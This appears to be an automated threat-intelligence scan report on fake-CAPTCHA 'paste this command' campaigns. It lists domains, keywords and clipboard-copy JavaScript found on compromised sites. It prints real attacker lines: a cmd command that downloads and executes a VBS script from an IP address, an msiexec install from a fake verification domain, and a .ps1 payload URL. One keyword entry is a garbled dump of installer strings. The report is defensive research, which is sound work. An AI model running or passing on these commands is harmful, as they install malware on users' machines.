← Back to Analysis

Emerging ClickGrab Campaign: Advanced Analysis of 2026-06-21 Attack Patterns

📅 Published: June 21, 2026 👨‍💻 Author: ClickGrab Threat Intelligence Team 📖 12 min read
100Sites
13%Detection
3PS Downloads

ClickGrab Threat Analysis Report - 2026-06-21

Generated on 2026-06-21 01:53:22

Executive Summary

  • Total sites analyzed: 100
  • Sites with malicious content: 13
  • Unique domains encountered: 944
  • Total URLs extracted: 6,489
  • PowerShell download attempts: 3
  • Clipboard manipulation instances: 45

Domain Analysis

Most Frequently Encountered Domains

  • bharatnamkeens.com: 374 occurrences
  • baovechuyennghiep.baovengayvadem.com: 348 occurrences
  • www.maheshwaree.com: 316 occurrences
  • 98.70.13.131: 303 occurrences
  • fudgeshop.com.au: 265 occurrences
  • picsera.com: 227 occurrences
  • 18.176.47.246: 218 occurrences
  • www.ccera-icar.org: 178 occurrences
  • senevie.com: 165 occurrences
  • www.evodigital.com.au: 156 occurrences
  • www.creatorssky.com: 154 occurrences
  • setenews.com: 150 occurrences
  • devblog.ezeelogin.com: 126 occurrences
  • picsera.sirv.com: 125 occurrences
  • www.dorper.com.au: 125 occurrences

URL Pattern Analysis

reCAPTCHA imagery

16 occurrences across 12 distinct URLs

  • https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (3 times)
  • https://www.google.com/recaptcha/api.js (2 times)
  • https://2captcha.com/dist/web/assets/google-privacy-policy-Cb0CGVRT.svg (2 times)
  • http://172.96.189.153/wp-content/plugins/cf-security-shield/assets/css/captcha-styles.css?ver=1.0.0 (1 times)
  • http://172.96.189.153/wp-content/plugins/ckk/assets/css/captcha-styles.css?ver=2.0.0 (1 times)
  • ...and 7 more distinct URLs

Font resources

77 occurrences across 59 distinct URLs

  • https://fonts.gstatic.com (6 times)
  • http://casa-ananda.cl/wp-content/uploads/et-fonts/Montserrat-Bold.ttf (4 times)
  • http://casa-ananda.cl/wp-content/uploads/et-fonts/Montserrat-Regular.ttf (4 times)
  • https://use.fontawesome.com/releases/v5.0.0/css/all.css (3 times)
  • https://fonts.googleapis.com (3 times)
  • ...and 54 more distinct URLs

CDN hosted scripts

11 occurrences across 11 distinct URLs

  • https://cdn.jsdelivr.net/npm/three@0.167.0/build/three.module.js (1 times)
  • https://cdn.jsdelivr.net/npm/three@0.167.0/examples/jsm/ (1 times)
  • https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 (1 times)
  • https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.css?ver=6.8.5 (1 times)
  • https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.min.js?ver=6.0.8 (1 times)
  • ...and 6 more distinct URLs

Google resources

92 occurrences across 58 distinct URLs

  • https://bharatnamkeens.com/wp-content/plugins/widget-google-reviews/assets/img/guest.png (18 times)
  • https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent (4 times)
  • https://www.googletagmanager.com/gtm.js?id= (4 times)
  • https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (3 times)
  • https://www.google (3 times)
  • ...and 53 more distinct URLs

Suspicious Keyword Analysis

Total Keywords Found: 381 (103 unique)

Keyword Categories

Social Engineering

53 unique keywords

  • Command line: [2]Removing applicationsRemoving filesRemoving foldersFile: [1], Section: [2], Key: [3], Value: [4]Removing INI file entriesRemoving ODBC componentsRemoving system registry valuesKey: [1], Name: [2]Removing shortcutsFile: [1], Folder: [2]Registering modulesRemoving backup filesRollbackRemoving moved filesRollbackCleanupInitializing ODBC directoriesStarting servicesStopping servicesUnpublishing Qualified ComponentsUnpublishing product informationThe wizard was interrupted before [ProductName] could be completely installed.UnmoveFilesUnpublishing product featuresUnregister class serversCreating IIS Virtual Roots...UnpublishProductAppId: [1]{{, AppType: [2]}}Unregistering COM+ Applications and ComponentsUnregistering extension serversUnregistering fontsUnregistering MIME infoUnregistering program identifiersUnregistering type librariesWriting INI file valuesKey: [1], Name: [2], Value: [3]Writing system registry valuesAdvertising applicationRemoving IIS Virtual Roots...caCreateVRoots{&TahomaBold10}Welcome to the InstallShield Wizard for [ProductName]caRemoveVRoots1ISCHECKFORPRODUCTUPDATESAllUsersApplicationUsersNoAgreeToLicenseChange_IsMaintenanceCloseRestartRestartManagerOptionTypicalSetupType_IsSetupTypeMinDisplay_IsBitmapDlg{3B59CBE2-36D2-452F-B123-685CEEEB7456}[1]ALLUSERSARPPRODUCTICON.exeARPPRODUCTICON30DWUSINTERVALCE8B87EF8EFC67DF99ACF778AEBB978FDEEB808FFEAB07BFCEBC872FEE9BD088CECCA08FC9ACDWUSLINKTahoma8DefaultUIFontInstallShield for Windows InstallerDialogCaptionMinimalDisplayNameCustomThe InstallShield(R) Wizard will create a server image of [ProductName] at a specified network location. To continue, click Next.DisplayNameMinimalCosting COM+ application: [1]DisplayNameTypicalSetupErrorErrorDialog100INSTALLLEVEL0ISVROOT_PORT_NOInstalling COM+ application: [1]IS_COMPLUS_PROGRESSTEXT_COSTUninstalling COM+ application: [1]IS_COMPLUS_PROGRESSTEXT_INSTALLA newer version of this application is already installed on this computer. If you wish to install this version, please uninstall the newer version first. Click OK to exit the wizard.IS_COMPLUS_PROGRESSTEXT_UNINSTALLReplacing %s with %s in %s...IS_PREVENT_DOWNGRADE_EXITCosting XML files...IS_PROGMSG_TEXTFILECHANGS_REPLACECreating XML file %s...IS_PROGMSG_XML_COSTINGPerforming XML file changes...IS_PROGMSG_XML_CREATE_FILERemoving XML file %s...IS_PROGMSG_XML_FILESRolling back XML file changes...IS_PROGMSG_XML_REMOVE_FILEUpdating XML file %s...IS_PROGMSG_XML_ROLLBACK_FILESYour Company NameIS_PROGMSG_XML_UPDATE_FILEIS_SQLSERVER_AUTHENTICATIONsaIS_SQLSERVER_USERNAMEARInstallChoiceCreating application pool %sManufacturer12345<###-%%%%%%%>@@@@@PIDTemplateCreating application Pools...PROGMSG_IIS_CREATEAPPPOOLCreating IIS virtual directory %sPROGMSG_IIS_CREATEAPPPOOLSCreating IIS virtual directories...PROGMSG_IIS_CREATEVROOTCreating web service extensionPROGMSG_IIS_CREATEVROOTSCreating web service extensions...PROGMSG_IIS_CREATEWEBSERVICEEXTENSIONCreating IIS website %sPROGMSG_IIS_CREATEWEBSERVICEEXTENSIONSCreating IIS websites...PROGMSG_IIS_CREATEWEBSITEExtracting information for IIS virtual directories...PROGMSG_IIS_CREATEWEBSITESExtracted information for IIS virtual directories...PROGMSG_IIS_EXTRACTRemoving application po !"$0/& 2  &,!  2 & 
  • CaptchaLoading
  • command =msiexec /i https://i-like-ele-phants-verification.live/iamchallenge/verification/UserID7383526;
  • captcha-verified
  • robot
  • Checking if you are human
  • captcha_word
  • CaptchaCheckbox
  • captcha_site_key
  • captcha_link_
  • ...and 43 more

Obfuscation Indicators

5 unique keywords

  • eval('var timeOut'+popupItems[i].id)
  • eval("clearTimeout(timeIn"+uid+")")
  • eval("clearTimeout(timeOut"+uid+")")
  • eval("timeOut"+uid+" = setTimeout(function(){ li.find('> .catalog-section-childs').hide(15); }, 200);")
  • eval("timeIn"+uid+" = setTimeout(function(){ li.find('> .catalog-section-childs').show(15).css({'top': top + 'px', 'left': left + 'px'}); }, 200);")

System Commands

24 unique keywords

  • cmd
  • Command ⌘</kbd>+<kbd>V</kbd>) the command into Terminal and press <kbd>Return</kbd>.</li>
  • Command =windows_command;
  • exec(
  • powershell
  • cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.1"):h.Open "GET","http://198.13.158.127:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
  • POWerShEll
  • command into the terminal and press <kbd>Enter</kbd>.</li>
  • Invoke-WebRequest
  • exec(ua) != null){rv = parseFloat(RegExp.$1);}}else if (n.appName == "Netscape"){rv = 11;re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");if (re.exec(ua) != null){rv = parseFloat(RegExp.$1);}}}return rv;}})(window, document, navigator)
  • ...and 14 more

Verification Text

2 unique keywords

  • Hidden
  • hidden

Technical Terms

19 unique keywords

  • .ps1
  • bypass
  • Bypass
  • WinHttpRequest
  • VirtualAlloc
  • XMLHTTP
  • press Enter
  • Ray ID
  • iex
  • You will observe
  • ...and 9 more

Most Frequent Keywords

  • hidden: 38 occurrences
  • robot: 36 occurrences
  • Robot: 26 occurrences
  • failed_to_retrieve: 24 occurrences
  • captcha: 18 occurrences
  • CAPTCHA: 11 occurrences
  • verification: 10 occurrences
  • I am not a robot: 9 occurrences
  • Verification: 9 occurrences
  • CAPTCHA Verification: 8 occurrences
  • You will observe: 8 occurrences
  • verification-id: 8 occurrences
  • To better prove you are not a robot: 8 occurrences
  • Captcha: 7 occurrences
  • Verification ID: 7 occurrences

Similar Keyword Patterns

Groups of keywords that appear to be variations of the same theme:

Group 1: captcha-styles, captcha-styles-css, captcha-loader, CaptchaListeners, captcha-js, captchaSiteKey

Group 2: Captcha, CaptchaImages, captcha-modal, captcha, captcha_page, CAPTCHA, captcha-badge, captcha-logo, CAPTCHA-logo, captcha-box, captcha_word, captcha_sid, captcha_0, captcha_link_, CaptchaError

Group 3: captcha-overlay, captcha-verified

Group 4: captcha-container, captcha-loader-js, CaptchaLoading

Group 5: robot, Robot

JavaScript Obfuscation Analysis

Obfuscation Sophistication Score: 0/7

Potential Base64 Encoded Content

These strings may contain encoded malicious payloads:

  • CREATEWEBSITESExtracted
  • CREATEAPPPOOLCreating
  • exeARPPRODUCTICON30DWUSINTERVALCE8B87EF8EFC67DF99A...
  • DisplayNameTypicalSetupErrorErrorDialog100INSTALLL...
  • ALLUSERSARPPRODUCTICON

Clipboard Manipulation Analysis

Detected clipboard manipulation in 45 instances.

Document.Execcommand Copy

Found in 19 snippets (42.2% of clipboard code)

Examples:

document.execCommand("copy")

document.execCommand('copy')

...try { const successful = document.execCommand('copy')

Textarea Manipulation

Found in 19 snippets (42.2% of clipboard code)

Examples:

ipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"

tListener("click", function () { const textarea = document.createElement('textarea'

Complete Malicious Functions

Function 1:

function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }

Report truncated for storage. Full per-site detail is available in the scan JSON under nightly_reports/.